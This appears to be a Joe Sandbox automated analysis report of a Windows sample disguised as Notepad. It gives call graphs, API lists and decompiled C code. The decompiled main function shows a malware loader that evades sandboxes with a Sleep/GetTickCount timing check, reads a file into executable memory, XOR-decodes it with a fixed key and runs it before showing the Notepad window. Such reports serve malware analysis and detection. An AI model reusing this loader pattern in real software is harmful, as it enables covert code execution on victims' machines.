__tsopen_nolock 115 API calls 7961->7962 7966 28778b 7962->7966 7967 283d0b __write_nolock 66 API calls 7963->7967 7971 28774a __mtinitlocknum 7964->7971 7977 287082 7965->7977 7968 2877b2 __wsopen_helper LeaveCriticalSection 7966->7968 7969 287150 7967->7969 7968->7971 7970 283cf8 __write_nolock 66 API calls 7969->7970 7973 28715a 7970->7973 7971->7942 8063 28970b 7972->8063 7975 283ca6 __write_nolock 11 API calls 7973->7975 7975->7977 7976 2871dc 7978 2871e5 7976->7978 7979 287206 CreateFileW 7976->7979 7977->7942 7980 283d0b __write_nolock 66 API calls 7978->7980 7981 2872a3 GetFileType 7979->7981 7982 287233 7979->7982 7983 2871ea 7980->7983 7984 2872b0 GetLastError 7981->7984 7985 2872f4 7981->7985 7986 28726c GetLastError 7982->7986 7989 287247 CreateFileW 7982->7989 7987 283cf8 __write_nolock 66 API calls 7983->7987 7988 283d1e __dosmaperr 66 API calls 7984->7988 8089 2894d5 7985->8089 8084 283d1e 7986->8084 7991 2871f4 7987->7991 7992 2872d9 CloseHandle 7988->7992 7989->7981 7989->7986 7994 283cf8 __write_nolock 66 API calls 7991->7994 7993 287293 7992->7993 7995 2872e7 7992->7995 7997 283cf8 __write_nolock 66 API calls 7993->7997 7994->7977 7998 283cf8 __write_nolock 66 API calls 7995->7998 7997->7948 7999 2872ec 7998->7999 7999->7993 8000 287529 8000->7948 8003 287691 CloseHandle CreateFileW 8000->8003 8006 2876be GetLastError 8003->8006 8007 28759d 8003->8007 8005 287380 8005->8000 8014 287532 8005->8014 8017 287388 8005->8017 8026 287482 8005->8026 8010 283d1e __dosmaperr 66 API calls 8006->8010 8007->7948 8008 28737b 8011 283d0b __write_nolock 66 API calls 8008->8011 8009 287394 8123 28500b 8009->8123 8013 2876ca 8010->8013 8011->8005 8258 289556 8013->8258 8014->8000 8025 28754f 8014->8025 8030 2874a6 8014->8030 8108 28a957 8017->8108 8018 2874fa 8022 28500b __read_nolock 75 API calls 8018->8022 8019 2873c6 8021 285a1f __lseek_nolock 68 API calls 8019->8021 8020 2873b3 8191 28a7a1 8020->8191 8021->8005 8038 287507 8022->8038 8028 287c67 
__lseeki64_nolock 68 API calls 8025->8028 8026->8000 8026->8018 8026->8030 8031 2874d1 8026->8031 8029 28755a 8028->8029 8029->8030 8033 287565 8029->8033 8030->8000 8030->8017 8233 2884d3 8030->8233 8223 287c67 8031->8223 8041 287c67 __lseeki64_nolock 68 API calls 8033->8041 8035 2875aa 8037 2875cc 8035->8037 8039 2875b1 8035->8039 8036 287590 8043 28a957 __close_nolock 69 API calls 8036->8043 8042 285a1f __lseek_nolock 68 API calls 8037->8042 8038->8000 8038->8017 8038->8035 8038->8036 8038->8037 8044 285a1f __lseek_nolock 68 API calls 8039->8044 8046 28756f 8041->8046 8048 287574 8042->8048 8047 287597 8043->8047 8044->8048 8045 2874e3 8049 287c67 __lseeki64_nolock 68 API calls 8045->8049 8046->8048 8050 283cf8 __write_nolock 66 API calls 8047->8050 8048->8000 8048->8017 8051 2874ed 8049->8051 8050->8007 8051->8017 8051->8018 8053 2877b7 8052->8053 8055 2877de 8052->8055 8381 2896e4 LeaveCriticalSection 8053->8381 8055->7944 8057 28ab7e 8056->8057 8058 28ab93 8056->8058 8059 283cf8 __write_nolock 66 API calls 8057->8059 8058->7953 8060 28ab83 8059->8060 8061 283ca6 __write_nolock 11 API calls 8060->8061 8062 28ab8e 8061->8062 8062->7953 8064 289717 __mtinitlocknum 8063->8064 8065 286ef2 __mtinitlocknum 66 API calls 8064->8065 8066 289727 8065->8066 8067 286fb4 __lock 66 API calls 8066->8067 8069 28972c __mtinitlocknum 8066->8069 8068 28973b 8067->8068 8071 289813 8068->8071 8074 286fb4 __lock 66 API calls 8068->8074 8075 2897bb EnterCriticalSection 8068->8075 8077 289791 InitializeCriticalSectionAndSpinCount 8068->8077 8080 28987d 8068->8080 8267 2897dd 8068->8267 8069->7976 8072 286cca __calloc_crt 66 API calls 8071->8072 8073 28981c 8072->8073 8073->8080 8270 289645 8073->8270 8074->8068 8075->8068 8076 2897cb LeaveCriticalSection 8075->8076 8076->8068 8077->8068 8280 28989b 8080->8280 8082 28688f __getptd_noexit 66 API calls 8081->8082 8083 283d10 8082->8083 8083->7957 8085 283d0b __write_nolock 66 API calls 8084->8085 8086 283d29 __dosmaperr 8085->8086 8087 
283cf8 __write_nolock 66 API calls 8086->8087 8088 283d3c 8087->8088 8088->7993 8090 28953c 8089->8090 8091 2894e3 8089->8091 8092 283cf8 __write_nolock 66 API calls 8090->8092 8091->8090 8097 289507 8091->8097 8093 289541 8092->8093 8094 283d0b __write_nolock 66 API calls 8093->8094 8095 287312 8094->8095 8095->8000 8095->8005 8098 285a1f 8095->8098 8096 28952c SetStdHandle 8096->8095 8097->8095 8097->8096 8288 2895dc 8098->8288 8100 285a2e 8101 285a44 SetFilePointer 8100->8101 8102 285a34 8100->8102 8104 285a5b GetLastError 8101->8104 8105 285a63 8101->8105 8103 283cf8 __write_nolock 66 API calls 8102->8103 8106 285a39 8103->8106 8104->8105 8105->8106 8107 283d1e __dosmaperr 66 API calls 8105->8107 8106->8008 8106->8009 8107->8106 8109 2895dc __lseek_nolock 66 API calls 8108->8109 8110 28a967 8109->8110 8111 28a9bd 8110->8111 8113 28a99b 8110->8113 8116 2895dc __lseek_nolock 66 API calls 8110->8116 8112 289556 __free_osfhnd 67 API calls 8111->8112 8115 28a9c5 8112->8115 8113->8111 8114 2895dc __lseek_nolock 66 API calls 8113->8114 8117 28a9a7 CloseHandle 8114->8117 8118 28a9e7 8115->8118 8121 283d1e __dosmaperr 66 API calls 8115->8121 8119 28a992 8116->8119 8117->8111 8120 28a9b3 GetLastError 8117->8120 8118->7999 8122 2895dc __lseek_nolock 66 API calls 8119->8122 8120->8111 8121->8118 8122->8113 8124 285042 8123->8124 8125 285027 8123->8125 8127 285051 8124->8127 8129 285070 8124->8129 8126 283d0b __write_nolock 66 API calls 8125->8126 8128 28502c 8126->8128 8130 283d0b __write_nolock 66 API calls 8127->8130 8133 283cf8 __write_nolock 66 API calls 8128->8133 8132 28508e 8129->8132 8146 2850a2 8129->8146 8131 285056 8130->8131 8134 283cf8 __write_nolock 66 API calls 8131->8134 8135 283d0b __write_nolock 66 API calls 8132->8135 8143 285034 8133->8143 8137 28505d 8134->8137 8139 285093 8135->8139 8136 2850f8 8138 283d0b __write_nolock 66 API calls 8136->8138 8140 283ca6 __write_nolock 11 API calls 8137->8140 8141 2850fd 8138->8141 8142 283cf8 __write_nolock 66 API 
calls 8139->8142 8140->8143 8144 283cf8 __write_nolock 66 API calls 8141->8144 8145 28509a 8142->8145 8143->8019 8143->8020 8144->8145 8149 283ca6 __write_nolock 11 API calls 8145->8149 8146->8136 8146->8143 8147 2850d7 8146->8147 8148 285111 8146->8148 8147->8136 8155 2850e2 ReadFile 8147->8155 8150 286c85 __malloc_crt 66 API calls 8148->8150 8149->8143 8152 285127 8150->8152 8156 28514f 8152->8156 8157 285131 8152->8157 8153 28520d 8154 285585 GetLastError 8153->8154 8162 285221 8153->8162 8158 28540c 8154->8158 8159 285592 8154->8159 8155->8153 8155->8154 8163 287c67 __lseeki64_nolock 68 API calls 8156->8163 8160 283cf8 __write_nolock 66 API calls 8157->8160 8166 283d1e __dosmaperr 66 API calls 8158->8166 8172 285391 8158->8172 8161 283cf8 __write_nolock 66 API calls 8159->8161 8164 285136 8160->8164 8165 285597 8161->8165 8171 28523d 8162->8171 8162->8172 8176 285451 8162->8176 8167 28515d 8163->8167 8168 283d0b __write_nolock 66 API calls 8164->8168 8169 283d0b __write_nolock 66 API calls 8165->8169 8166->8172 8167->8155 8168->8143 8169->8172 8170 286d64 _free 66 API calls 8170->8143 8173 2852a1 ReadFile 8171->8173 8178 28531e 8171->8178 8172->8143 8172->8170 8175 2852bf GetLastError 8173->8175 8187 2852c9 8173->8187 8174 2854c6 ReadFile 8177 2854e5 GetLastError 8174->8177 8188 2854ef 8174->8188 8175->8171 8175->8187 8176->8172 8176->8174 8177->8176 8177->8188 8178->8172 8179 285399 8178->8179 8180 28538c 8178->8180 8183 285356 8178->8183 8179->8183 8184 2853d0 8179->8184 8182 283cf8 __write_nolock 66 API calls 8180->8182 8181 285406 GetLastError 8181->8158 8182->8172 8183->8172 8183->8181 8189 287c67 __lseeki64_nolock 68 API calls 8184->8189 8185 287c67 __lseeki64_nolock 68 API calls 8185->8187 8186 287c67 __lseeki64_nolock 68 API calls 8186->8188 8187->8171 8187->8185 8188->8176 8188->8186 8190 2853df 8189->8190 8190->8183 8192 287c67 __lseeki64_nolock 68 API calls 8191->8192 8193 28a7c0 8192->8193 8194 28a823 8193->8194 8196 287c67 __lseeki64_nolock 68 API 
calls 8193->8196 8195 283cf8 __write_nolock 66 API calls 8194->8195 8197 2873bf 8194->8197 8195->8197 8199 28a7dc 8196->8199 8197->8017 8197->8019 8198 28a8be 8202 287c67 __lseeki64_nolock 68 API calls 8198->8202 8218 28a927 8198->8218 8199->8194 8199->8198 8200 28a802 HeapAlloc 8199->8200 8205 28a81e 8200->8205 8211 28a835 __setmode_nolock 8200->8211 8201 287c67 __lseeki64_nolock 68 API calls 8201->8194 8204 28a8d7 8202->8204 8204->8194 8207 2895dc __lseek_nolock 66 API calls 8204->8207 8206 283cf8 __write_nolock 66 API calls 8205->8206 8206->8194 8208 28a8ed SetEndOfFile 8207->8208 8209 28a90a 8208->8209 8208->8218 8210 283cf8 __write_nolock 66 API calls 8209->8210 8212 28a90f 8210->8212 8215 28a8a1 8211->8215 8220 28a878 __setmode_nolock 8211->8220 8301 287dd6 8211->8301 8214 283d0b __write_nolock 66 API calls 8212->8214 8216 28a91a GetLastError 8214->8216 8217 283d0b __write_nolock 66 API calls 8215->8217 8216->8218 8219 28a8a6 8217->8219 8218->8194 8218->8201 8219->8220 8221 283cf8 __write_nolock 66 API calls 8219->8221 8222 28a893 HeapFree 8220->8222 8221->8220 8222->8218 8224 2895dc __lseek_nolock 66 API calls 8223->8224 8225 287c85 8224->8225 8226 287c8d 8225->8226 8227 287c9e SetFilePointer 8225->8227 8228 283cf8 __write_nolock 66 API calls 8226->8228 8229 287cb6 GetLastError 8227->8229 8230 2874dc 8227->8230 8228->8230 8229->8230 8231 287cc0 8229->8231 8230->8030 8230->8045 8232 283d1e __dosmaperr 66 API calls 8231->8232 8232->8230 8234 2884df __mtinitlocknum 8233->8234 8235 288502 8234->8235 8236 2884e7 8234->8236 8238 28850e 8235->8238 8241 288548 8235->8241 8237 283d0b __write_nolock 66 API calls 8236->8237 8239 2884ec 8237->8239 8240 283d0b __write_nolock 66 API calls 8238->8240 8242 283cf8 __write_nolock 66 API calls 8239->8242 8243 288513 8240->8243 8244 289645 ___lock_fhandle 68 API calls 8241->8244 8253 2884f4 __mtinitlocknum 8242->8253 8245 283cf8 __write_nolock 66 API calls 8243->8245 8246 28854e 8244->8246 8247 28851b 8245->8247 8248 28855c 
8246->8248 8249 288570 8246->8249 8250 283ca6 __write_nolock 11 API calls 8247->8250 8251 287dd6 __write_nolock 92 API calls 8248->8251 8252 283cf8 __write_nolock 66 API calls 8249->8252 8250->8253 8254 288568 8251->8254 8255 288575 8252->8255 8253->8030 8377 28859f 8254->8377 8256 283d0b __write_nolock 66 API calls 8255->8256 8256->8254 8259 2895c2 8258->8259 8260 289567 8258->8260 8261 283cf8 __write_nolock 66 API calls 8259->8261 8260->8259 8265 289592 8260->8265 8262 2895c7 8261->8262 8263 283d0b __write_nolock 66 API calls 8262->8263 8264 2895b8 8263->8264 8264->8007 8265->8264 8266 2895b2 SetStdHandle 8265->8266 8266->8264 8283 286edb LeaveCriticalSection 8267->8283 8269 2897e4 8269->8068 8271 289651 __mtinitlocknum 8270->8271 8272 2896ab 8271->8272 8273 286fb4 __lock 66 API calls 8271->8273 8274 2896cd __mtinitlocknum 8272->8274 8275 2896b0 EnterCriticalSection 8272->8275 8276 28967d 8273->8276 8274->8080 8275->8274 8277 289699 8276->8277 8278 289686 InitializeCriticalSectionAndSpinCount 8276->8278 8284 2896db 8277->8284 8278->8277 8287 286edb LeaveCriticalSection 8280->8287 8282 2898a2 8282->8069 8283->8269 8285 286edb _doexit LeaveCriticalSection 8284->8285 8286 2896e2 8285->8286 8286->8272 8287->8282 8289 2895e9 8288->8289 8291 289601 8288->8291 8290 283d0b __write_nolock 66 API calls 8289->8290 8293 2895ee 8290->8293 8292 283d0b __write_nolock 66 API calls 8291->8292 8295 289640 8291->8295 8294 289612 8292->8294 8296 283cf8 __write_nolock 66 API calls 8293->8296 8298 283cf8 __write_nolock 66 API calls 8294->8298 8295->8100 8297 2895f6 8296->8297 8297->8100 8299 28961a 8298->8299 8300 283ca6 __write_nolock 11 API calls 8299->8300 8300->8297 8302 287de5 __write_nolock 8301->8302 8303 287e10 8302->8303 8304 287e3a 8302->8304 8305 287e1b 8302->8305 8306 2879c4 __write_nolock 5 API calls 8303->8306 8309 287e96 8304->8309 8310 287e79 8304->8310 8307 283d0b __write_nolock 66 API calls 8305->8307 8308 2884d1 8306->8308 8311 287e20 8307->8311 8308->8211 8313 
287ea9 8309->8313 8317 287c67 __lseeki64_nolock 68 API calls 8309->8317 8312 283d0b __write_nolock 66 API calls 8310->8312 8314 283cf8 __write_nolock 66 API calls 8311->8314 8316 287e7e 8312->8316 8360 2885f0 8313->8360 8318 287e27 8314->8318 8321 283cf8 __write_nolock 66 API calls 8316->8321 8317->8313 8319 283ca6 __write_nolock 11 API calls 8318->8319 8319->8303 8320 287eb2 8322 288154 8320->8322 8369 286908 8320->8369 8323 287e86 8321->8323 8325 288163 8322->8325 8326 288404 WriteFile 8322->8326 8324 283ca6 __write_nolock 11 API calls 8323->8324 8324->8303 8328 28821e 8325->8328 8340 288176 8325->8340 8330 288437 GetLastError 8326->8330 8333 288136 8326->8333 8339 28822b 8328->8339 8349 2882f8 8328->8349 8330->8333 8331 288482 8331->8303 8336 283cf8 __write_nolock 66 API calls 8331->8336 8332 287ef6 8332->8322 8334 287f06 GetConsoleCP 8332->8334 8333->8303 8333->8331 8337 288455 8333->8337 8334->8333 8357 287f29 8334->8357 8335 2881c0 WriteFile 8335->8330 8335->8340 8341 2884a5 8336->8341 8343 288460 8337->8343 8344 288474 8337->8344 8338 28829a WriteFile 8338->8330 8338->8339 8339->8331 8339->8333 8339->8338 8340->8331 8340->8333 8340->8335 8347 283d0b __write_nolock 66 API calls 8341->8347 8342 288369 WideCharToMultiByte 8342->8330 8345 2883a0 WriteFile 8342->8345 8348 283cf8 __write_nolock 66 API calls 8343->8348 8346 283d1e __dosmaperr 66 API calls 8344->8346 8345->8349 8350 2883d7 GetLastError 8345->8350 8346->8303 8347->8303 8351 288465 8348->8351 8349->8331 8349->8333 8349->8342 8349->8345 8350->8349 8352 283d0b __write_nolock 66 API calls 8351->8352 8352->8303 8354 287fd5 WideCharToMultiByte 8354->8333 8356 288006 WriteFile 8354->8356 8355 2893d1 76 API calls __fassign 8355->8357 8356->8330 8356->8357 8357->8330 8357->8333 8357->8354 8357->8355 8358 28ad45 WriteConsoleW CreateFileW __write_nolock 8357->8358 8359 28805a WriteFile 8357->8359 8374 289423 8357->8374 8358->8357 8359->8330 8359->8357 8361 28860c 8360->8361 8362 2885fd 8360->8362 8365 28862a 
8361->8365 8366 283cf8 __write_nolock 66 API calls 8361->8366 8363 283cf8 __write_nolock 66 API calls 8362->8363 8364 288602 8363->8364 8364->8320 8365->8320 8367 28861d 8366->8367 8368 283ca6 __write_nolock 11 API calls 8367->8368 8368->8364 8370 28688f __getptd_noexit 66 API calls 8369->8370 8371 286910 8370->8371 8372 28691d GetConsoleMode 8371->8372 8373 286018 __amsg_exit 66 API calls 8371->8373 8372->8322 8372->8332 8373->8372 8375 2893eb __isleadbyte_l 76 API calls 8374->8375 8376 289432 8375->8376 8376->8357 8380 2896e4 LeaveCriticalSection 8377->8380 8379 2885a5 8379->8253 8380->8379 8381->8055 8383 287815 8382->8383 8390 28782c 8382->8390 8384 28781c 8383->8384 8386 28783d 8383->8386 8385 283cf8 __write_nolock 66 API calls 8384->8385 8387 287821 8385->8387 8393 2841f6 8386->8393 8389 283ca6 __write_nolock 11 API calls 8387->8389 8389->8390 8390->7930 8391 287849 8391->8390 8392 28ab9f 78 API calls __towlower_l 8391->8392 8392->8391 8394 284209 8393->8394 8395 284256 8393->8395 8396 286908 __getptd 66 API calls 8394->8396 8395->8391 8397 28420e 8396->8397 8398 284236 8397->8398 8401 288fec 8397->8401 8398->8395 8416 288869 8398->8416 8402 288ff8 __mtinitlocknum 8401->8402 8403 286908 __getptd 66 API calls 8402->8403 8404 288ffd 8403->8404 8405 28902b 8404->8405 8406 28900f 8404->8406 8407 286fb4 __lock 66 API calls 8405->8407 8408 286908 __getptd 66 API calls 8406->8408 8409 289032 8407->8409 8410 289014 8408->8410 8432 288f9d 8409->8432 8414 286018 __amsg_exit 66 API calls 8410->8414 8415 289022 __mtinitlocknum 8410->8415 8414->8415 8415->8398 8417 288875 __mtinitlocknum 8416->8417 8418 286908 __getptd 66 API calls 8417->8418 8419 28887a 8418->8419 8420 286fb4 __lock 66 API calls 8419->8420 8429 28888c 8419->8429 8421 2888aa 8420->8421 8422 2888f3 8421->8422 8423 2888db InterlockedIncrement 8421->8423 8424 2888c1 InterlockedDecrement 8421->8424 8488 288904 8422->8488 8423->8422 8424->8423 8428 2888cc 8424->8428 8426 286018 __amsg_exit 66 API calls 8427 

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E002828A0(signed long long __fp0, struct HINSTANCE__* _a4, intOrPtr _a12, int _a16) {
                    				struct _WNDCLASSEXW _v52;
                    				intOrPtr _v68;
                    				intOrPtr _v72;
                    				intOrPtr _v76;
                    				struct tagMONITORINFO _v100;
                    				struct tagMSG _v128;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t46;
                    				void* _t47;
                    				struct HINSTANCE__* _t54;
                    				int _t56;
                    				struct HMONITOR__* _t61;
                    				intOrPtr _t63;
                    				struct HWND__* _t65;
                    				int _t75;
                    				int _t78;
                    				int _t79;
                    				int _t80;
                    				void* _t87;
                    				long _t89;
                    				void* _t91;
                    				void* _t98;
                    				intOrPtr* _t99;
                    				void* _t104;
                    				intOrPtr _t107;
                    				signed int _t113;
                    				int _t116;
                    				void* _t127;
                    				_Unknown_base(*)()* _t129;
                    				int _t130;
                    				void* _t134;
                    				void* _t135;
                    				int _t139;
                    				struct HACCEL__* _t140;
                    				long _t143;
                    				signed int _t144;
                    				void* _t146;
                    				signed long long _t155;
                    
                    				_t155 = __fp0;
                    				_t146 = (_t144 & 0xfffffff8) - 0x7c;
                    				_t99 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "GetTickCount");
                    				_v128.message = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "Sleep");
                    				_t129 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "VirtualAlloc");
                    				_t46 =  *_t99(_t127, _t135, _t98);
                    				_t137 = _t46; // executed
                    				Sleep(0x2be);
                    				_t47 =  *_t99();
                    				_t150 = _t47 - _t46 - 0x2bc;
                    				if(_t47 - _t46 >= 0x2bc) {
                    					_t87 = E00282D3E(_a12, L"rb"); // executed
                    					_push(2);
                    					_t104 = _t87;
                    					_push(0);
                    					_push(_t104); // executed
                    					E0028335F(_t104, _t129, _t137, _t150); // executed
                    					_push(_t104); // executed
                    					_t89 = E00283270(_t104, _t129, _t137, _t150); // executed
                    					_push(0);
                    					_push(0);
                    					_push(_t104);
                    					_t143 = _t89; // executed
                    					E0028335F(_t104, _t129, _t143, _t150); // executed
                    					_t91 = VirtualAlloc(0, _t143, 0x3000, 0x40); // executed
                    					_t134 = _t91;
                    					E002830BF(_t134, _t143, 1, _t104); // executed
                    					_t146 = _t146 + 0x34;
                    					_t113 = 0;
                    					if(_t143 != 0) {
                    						do {
                    							_t10 = _t113 - (0xaaaaaaab * _t113 >> 0x20 >> 3) + (0xaaaaaaab * _t113 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t113 >> 0x20 >> 3) + (0xaaaaaaab * _t113 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t113 >> 0x20 >> 3) + (0xaaaaaaab * _t113 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t113 >> 0x20 >> 3) + (0xaaaaaaab * _t113 >> 0x20 >> 3) * 2 + "248058040134"; // 0x30383432
                    							_t114 =  *_t10;
                    							 *(_t134 + _t113) =  *(_t134 + _t113) ^  *_t10;
                    							_t113 = _t113 + 1;
                    						} while (_t113 < _t143);
                    					}
                    					 *_t134(); // executed
                    				}
                    				 *0x295f64 = RegisterWindowMessageW(L"commdlg_FindReplace");
                    				E00285760(0x2970e0, 0, 0x11f4);
                    				 *0x2970e0 = _a4;
                    				E00281640(_t114, _t155);
                    				E00285760( &_v52, 0, 0x30);
                    				_t54 =  *0x2970e0;
                    				_v52.cbSize = 0x30;
                    				_v52.lpfnWndProc = E00282340;
                    				_v52.hInstance = _t54;
                    				_v52.hIcon = LoadIconW(_t54, 0x300);
                    				_t56 = GetSystemMetrics(0x32);
                    				_v52.hIconSm = LoadImageW( *0x2970e0, 0x300, 1, GetSystemMetrics(0x31), _t56, 0x8000);
                    				_v52.hCursor = LoadCursorW(0, 0x7f00);
                    				_v52.hbrBackground = 6;
                    				_v52.lpszMenuName = 0x201;
                    				_v52.lpszClassName = L"Notepad";
                    				_t61 = RegisterClassExW( &_v52);
                    				if(_t61 != 0) {
                    					__imp__MonitorFromRect(0x295f68, 1);
                    					_v100.cbSize = 0x28;
                    					GetMonitorInfoW(_t61,  &_v100);
                    					_t116 =  *0x295f68; // 0x0
                    					_t139 =  *0x295f6c; // 0x0
                    					_t63 =  *0x295f74; // 0x0
                    					_t107 =  *0x295f70; // 0x0
                    					_t130 = _t116;
                    					__eflags = _t116 - _v72;
                    					if(_t116 >= _v72) {
                    						L10:
                    						_t139 = 0x80000000;
                    						_t130 = 0x80000000;
                    					} else {
                    						__eflags = _t139 - _v68;
                    						if(_t139 >= _v68) {
                    							goto L10;
                    						} else {
                    							__eflags = _t107 - _v100.rcWork;
                    							if(_t107 < _v100.rcWork) {
                    								goto L10;
                    							} else {
                    								__eflags = _t63 - _v76;
                    								if(_t63 < _v76) {
                    									goto L10;
                    								}
                    							}
                    						}
                    					}
                    					_t65 = CreateWindowExW(0, L"Notepad", L"Notepad", 0xcf0000, _t130, _t139, _t107 - _t116, _t63 -  *0x295f6c, 0, 0,  *0x2970e0, 0);
                    					 *0x2970e4 = _t65;
                    					__eflags = _t65;
                    					if(_t65 == 0) {
                    						 *0x280000();
                    						ExitProcess(1);
                    					}
                    					E00281E60();
                    					 *0x280000();
                    					ShowWindow( *0x2970e4, _a16);
                    					UpdateWindow( *0x2970e4);
                    					DragAcceptFiles( *0x2970e4, 1);
                    					E00282690(GetCommandLineW());
                    					_t140 = LoadAcceleratorsW(_a4, 0x203);
                    					_t75 = GetMessageW( &_v128, 0, 0, 0);
                    					__eflags = _t75;
                    					if(_t75 != 0) {
                    						do {
                    							_t78 = IsDialogMessageW( *0x2970e8,  &_v128);
                    							__eflags = _t78;
                    							if(_t78 == 0) {
                    								_t80 = TranslateAcceleratorW( *0x2970e4, _t140,  &_v128);
                    								__eflags = _t80;
                    								if(_t80 == 0) {
                    									TranslateMessage( &_v128);
                    									DispatchMessageW( &_v128);
                    								}
                    							}
                    							_t79 = GetMessageW( &_v128, 0, 0, 0);
                    							__eflags = _t79;
                    						} while (_t79 != 0);
                    					}
                    					return _v128.wParam;
                    				} else {
                    					return 0;
                    				}
                    			}













































                    APIs
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTickCount), ref: 002828BC
                    • GetProcAddress.KERNEL32(00000000), ref: 002828C5
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,Sleep), ref: 002828D3
                    • GetProcAddress.KERNEL32(00000000), ref: 002828D6
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 002828E6
                    • GetProcAddress.KERNEL32(00000000), ref: 002828E9
                    • Sleep.KERNELBASE(000002BE), ref: 002828F6
                    • _fseek.LIBCMT ref: 0028291A
                    • _fseek.LIBCMT ref: 0028292C
                      • Part of subcall function 0028335F: __lock_file.LIBCMT ref: 002833A0
                      • Part of subcall function 0028335F: __fseek_nolock.LIBCMT ref: 002833B1
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0028293E
                    • __fread_nolock.LIBCMT ref: 00282947
                    • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 0028297F
                    • _memset.LIBCMT ref: 00282997
                    • _memset.LIBCMT ref: 002829B5
                    • LoadIconW.USER32 ref: 002829DC
                    • GetSystemMetrics.USER32 ref: 002829F3
                    • GetSystemMetrics.USER32 ref: 002829F8
                    • LoadImageW.USER32 ref: 00282A09
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00282A1D
                    • RegisterClassExW.USER32 ref: 00282A4A
                      • Part of subcall function 00282D3E: __wfsopen.LIBCMT ref: 00282D4B
                    • MonitorFromRect.USER32(00295F68,00000001), ref: 00282A67
                    • GetMonitorInfoW.USER32 ref: 00282A7B
                    • CreateWindowExW.USER32 ref: 00282AE3
                    • ExitProcess.KERNEL32 ref: 00282AFA
                    • ShowWindow.USER32(?,?,?,?,?,?,?,?,?), ref: 00282B15
                    • UpdateWindow.USER32(?), ref: 00282B22
                    • DragAcceptFiles.SHELL32(?,00000001), ref: 00282B31
                    • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 00282B37
                    • LoadAcceleratorsW.USER32 ref: 00282B4B
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00282B64
                    • IsDialogMessageW.USER32(?,?), ref: 00282B7B
                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00282B92
                    • TranslateMessage.USER32(?), ref: 00282B9D
                    • DispatchMessageW.USER32 ref: 00282BA8
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00282BB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Message$LoadWindow$AddressHandleModuleProc$MetricsMonitorRegisterSystemTranslate_fseek_memset$AcceleratorAcceleratorsAcceptAllocClassCommandCreateCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectShowSleepUpdateVirtual__fread_nolock__fseek_nolock__lock_file__wfsopen
                    • String ID: ($0$GetTickCount$Kernel32.dll$Notepad$Notepad$Sleep$VirtualAlloc$commdlg_FindReplace
                    • API String ID: 1051210470-2033289487
                    • Opcode ID: 49bfb13e275e2e19c8664da8b8f9b01c261d6ee4aa18747a999dce2a62f3af5f
                    • Instruction ID: b6a841668ad9cee587483ff2fed6c380b09105e22d734fb97bb9eab9265952bc
                    • Opcode Fuzzy Hash: 49bfb13e275e2e19c8664da8b8f9b01c261d6ee4aa18747a999dce2a62f3af5f
                    • Instruction Fuzzy Hash: F081D175661305AFD710EFB1EC8EF5B3BE8EF84B40F10451AFA45972D1DAB0A8148BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 312 5f0f9c-5f1194 call 5f005f call 5f0f1d call 5f0073 * 8 334 5f119b-5f11ab 312->334 335 5f1196 312->335 338 5f11ad 334->338 339 5f11b2-5f11e9 call 5f0422 CreateFileW 334->339 336 5f16ee-5f16f1 335->336 338->336 342 5f11eb 339->342 343 5f11f0-5f121f VirtualAlloc ReadFile 339->343 342->336 344 5f1226-5f1239 343->344 345 5f1221 343->345 347 5f123f-5f16d0 344->347 348 5f16d5-5f16e4 call 5f08ef 344->348 345->336 351 5f16e6-5f16e8 ExitProcess 348->351
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocNumaVirtual
                    • String ID:
                    • API String ID: 4233825816-0
                    • Opcode ID: e71b2ba7b68352c0358678b0ec84456f6d205c5ce43e8e75770dc2b316dfe94d
                    • Instruction ID: 85158f40ccec79ddfc935880644322fb53015883559292df210a3bb1cf670f55
                    • Opcode Fuzzy Hash: e71b2ba7b68352c0358678b0ec84456f6d205c5ce43e8e75770dc2b316dfe94d
                    • Instruction Fuzzy Hash: F442C720D5D2DCADDB12CBE994257FCBFB05F16201F0845CAE5E4E6283C57A838ADB25
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 527 5f0ebf-5f0f05 call 5f005f call 5f0073 GetSystemInfo 533 5f0f0e 527->533 534 5f0f07-5f0f0a 527->534 535 5f0f10-5f0f13 533->535 534->535
                    APIs
                    • GetSystemInfo.KERNELBASE(?), ref: 005F0EDC
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
